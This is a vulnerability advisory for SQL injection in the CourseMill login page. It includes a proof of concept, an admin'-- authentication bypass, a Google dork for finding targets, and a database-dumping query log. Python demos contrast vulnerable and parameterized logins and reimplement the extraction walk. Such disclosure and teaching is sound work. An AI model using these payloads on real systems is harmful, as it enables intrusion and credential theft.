+ Trivantis CourseMill Enterprise Learning Management System - SQL Injection - CVE-2007-6338



+==================================================================================================+
+ Trivantis CourseMill Enterprise Learning Management System - SQL Injection - CVE-2007-6338 +
+==================================================================================================+

DISCOVERED BY:
==============
sasquatch of SecureState - swhite@xxxxxxxxxxxxxxx

HOMEPAGE:
=========
www.securestate.com

AFFECTED AREA:
==============
The username field on the login page (userlogin.jsp) is susceptible to SQL injection. The value is placed into the login query without escaping or parameterization, so a single quote reaches the SQL parser and the raw database error is returned to the browser.

http://www.website.com/coursemill/userlogin.jsp seems to be the default login page.

Impact: Full dump of the underlying database without authenticating, including the login table with usernames and cleartext passwords, and from there whatever those accounts grant.

Proof of concept: submit a single quote as the username and anything as the password.

username: '
password: test

The application responds with the unhandled database error:

An unrecoverable error has occurred.
Please report this message to your system administrator.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
Exit
©2006 Trivantis Corporation. Trivantis and CourseMill are registered trademarks of Trivantis. All Rights Reserved.

Note that this error text is MySQL's, while the Exploiter query log further down uses SQL Server system tables and syntax (sysobjects, syscolumns, TOP 1, convert(nvarchar)). The two installations behind this advisory were evidently not on the same backend; the extraction queries have to be written for whichever database a given CourseMill deployment uses, and the verbose error on the login page tells you which one that is.
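To make the failure concrete, here is an added example that is not CourseMill's code (the JSP source is not part of this advisory). It reconstructs the assumed shape of the login query in Python against an in-memory SQLite table: string concatenation on one side, bound parameters on the other. The Admin table layout (ID, LastLogin, OrgId, Password) is taken from the advisory; the rows are constructed for the demo, and SQLite's syntax error stands in for the MySQL/SQL Server error the application leaked.

```python
import sqlite3

# Constructed stand-in for the CourseMill "Admin" table named in the advisory.
# Column names come from the advisory; the row contents are made up.
ADMIN_ROWS = [
    ("admin", "Oct 7 2007 2:45AM", "", "admin"),
    ("jsmith", "Dec 1 2007 9:12AM", "org1", "Winter07"),
]


def build_db():
    """In-memory SQLite database holding the assumed Admin table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Admin (ID TEXT, LastLogin TEXT, OrgId TEXT, Password TEXT)")
    con.executemany("INSERT INTO Admin VALUES (?, ?, ?, ?)", ADMIN_ROWS)
    return con


def vulnerable_login(con, username, password):
    """Assumed shape of the broken login: user input concatenated into SQL.

    Returns the matched ID or None.  A stray quote in either field reaches the
    SQL parser (the advisory's proof of concept), and a comment sequence in the
    username drops the password check entirely.
    """
    sql = ("SELECT ID FROM Admin WHERE ID = '" + username +
           "' AND Password = '" + password + "'")
    row = con.execute(sql).fetchone()   # raises sqlite3.OperationalError on bad SQL
    return row[0] if row else None


def fixed_login(con, username, password):
    """Hardened form: bound parameters, so input can never change the query."""
    sql = "SELECT ID FROM Admin WHERE ID = ? AND Password = ?"
    row = con.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def probe(con, username, password):
    """Run the vulnerable login and report what an attacker observes:
    'error' (a verbose database error), the ID that logged in, or None."""
    try:
        return vulnerable_login(con, username, password)
    except sqlite3.OperationalError:
        return "error"


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, single quote ->", probe(db, "'", "test"))
    print("vulnerable, admin'--     ->", probe(db, "admin'--", "wrong"))
    print("fixed, single quote      ->", fixed_login(db, "'", "test"))
    print("fixed, admin'--          ->", fixed_login(db, "admin'--", "wrong"))
    print("fixed, real credentials  ->", fixed_login(db, "admin", "admin"))
```

The single quote produces a syntax error, which is the whole signal an attacker needs; the `admin'--` username then logs in as admin without knowing the password, because everything after `--` is a comment. The parameterized version returns None for both payloads and only succeeds with the real credentials.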

EXPLOITATION:
=============
Exploiter Beta from WatchFire's AppScan eXtensions Framework can be used to pull ALL data from the underlying database through this single injection point, one value per query (see the query log below).

This is a free tool available from http://axf.watchfire.com/extensions/exploiter.aspx

The logins are stored in cleartext in the "Admin" table. Column names are: ID, LastLogin, OrgId, Password. In the tested instance the built-in "admin" account was recovered with the password "admin".

This was found during a penetration test and was not tested as to whether or not further exploitation from inside the application is possible.

CONFIRMED AGAINST:
==================
CourseMill Enterprise v.4.1 SP4 (4527) (http://www.trivantis.com/products/coursemill.html)


EXAMPLE GOOGLEDORK:
===================
"Trivantis and CourseMill are registered trademarks of Trivantis"


VENDOR INFORMATION:
===================
Trivantis Corporation
311 Elm Street Suite 200
Cincinnati, OH 45202
877-929-0188
513-929-0188
http://www.trivantis.com

Vendor notified on 12-13-07 and the product development manager was uncooperative and hung up on us.


Sample Query Logs from Exploiter Beta:
======================================
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin')
Column found: table=Admin, column=ID
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'ID'
Column found: table=Admin, column=LastLogin
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'LastLogin'
Column found: table=Admin, column=OrgId
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'OrgId'
Column found: table=Admin, column=Password
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'Password'
Extracting records for table=Admin...
Exploit method is now Convert
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT ID)) FROM Admin
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT LastLogin)) FROM Admin
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT OrgId)) FROM Admin
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT Password)) FROM Admin
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(ID,'')))) FROM Admin
Value found: table=Admin, column=ID, value=admin
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(LastLogin,'')))) FROM Admin WHERE RTRIM(convert(nvarchar(255),isnull(ID,'')))='admin'
Value found: table=Admin, column=LastLogin, value=Oct 7 2007 2:45AM
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(OrgId,'')))) FROM Admin WHERE RTRIM(convert(nvarchar(255),isnull(ID,'')))='admin'
Value found: table=Admin, column=OrgId, value=
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(Password,'')))) FROM Admin WHERE RTRIM(convert(nvarchar(255),isnull(ID,'')))='admin'
Value found: table=Admin, column=Password, value=admin

Etc...

Exploiter continues in the same way and proceeds to dump the entire database.
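The log shows the inner SELECTs that Exploiter issues; each one returns a single scalar, which the injection carries back to the attacker (the wrapper that does that is not shown in the log). The pattern is a MIN()/greater-than walk: ask for the smallest column name, then the smallest name greater than the last one seen, and so on until MIN returns NULL; the COUNT(DISTINCT ...) queries pick a column that can serve as a row key, and rows are then read the same way, one value per query. The following added example (my code, not Exploiter's or Trivantis') reimplements that walk in Python against an in-memory SQLite copy of the Admin table. SQLite's pragma_table_info stands in for syscolumns/sysobjects, a function call stands in for the network round trip, ID is simply assumed to be the key column, and the row contents are constructed.

```python
import sqlite3

# Constructed stand-in for the Admin table from the advisory (column names from
# the advisory, row contents made up for the demo).
ADMIN_ROWS = [
    ("admin", "Oct 7 2007 2:45AM", "", "admin"),
    ("jsmith", "Dec 1 2007 9:12AM", "org1", "Winter07"),
    ("mlee", "Nov 20 2007 4:03PM", "org2", "letmein"),
]


def build_db():
    """In-memory SQLite database holding the assumed Admin table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Admin (ID TEXT, LastLogin TEXT, OrgId TEXT, Password TEXT)")
    con.executemany("INSERT INTO Admin VALUES (?, ?, ?, ?)", ADMIN_ROWS)
    return con


def make_oracle(con):
    """Models the injection channel: one query in, one scalar (or None) out.
    In the real attack the scalar is read out of the error page; here it is
    simply the first column of the first row."""
    def oracle(sql, params=()):
        row = con.execute(sql, params).fetchone()
        return None if row is None or row[0] is None else str(row[0])
    return oracle


def walk(oracle, sql_min_template, params=()):
    """Generic MIN()/greater-than walk, the loop visible in the Exploiter log
    (... AND name>'ID', ... AND name>'LastLogin', ...).  The template's last
    placeholder receives the previous value; an empty string starts the walk.
    Caveat: a value that is itself the empty string is never returned, since
    nothing is strictly greater-than-and-equal to the start marker."""
    seen = []
    last = ""
    while True:
        value = oracle(sql_min_template, params + (last,))
        if value is None:          # MIN over an empty set: nothing left
            return seen
        seen.append(value)
        last = value


def enumerate_columns(oracle, table):
    """Column names of `table`, one per query.  pragma_table_info plays the role
    of SQL Server's syscolumns joined to sysobjects in the original log."""
    sql = f"SELECT MIN(name) FROM pragma_table_info('{table}') WHERE name > ?"
    return walk(oracle, sql)


def dump_table(oracle, table, key_column, columns):
    """Walk the key column, then fetch each remaining column of every row,
    mirroring 'Value found: table=Admin, column=..., value=...'."""
    keys = walk(oracle, f"SELECT MIN({key_column}) FROM {table} WHERE {key_column} > ?")
    rows = []
    for key in keys:
        row = {key_column: key}
        for col in columns:
            if col != key_column:
                row[col] = oracle(f"SELECT MIN({col}) FROM {table} WHERE {key_column} = ?", (key,))
        rows.append(row)
    return rows


if __name__ == "__main__":
    oracle = make_oracle(build_db())
    cols = enumerate_columns(oracle, "Admin")
    print("columns:", cols)
    for row in dump_table(oracle, "Admin", "ID", cols):
        print(row)
```

Every value costs one query, which is why tools of this kind can be slow and why they show up in web server logs as long runs of near-identical requests to the login page that differ only in the trailing comparison value; that is also what to look for when hunting for this class of attack after the fact.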


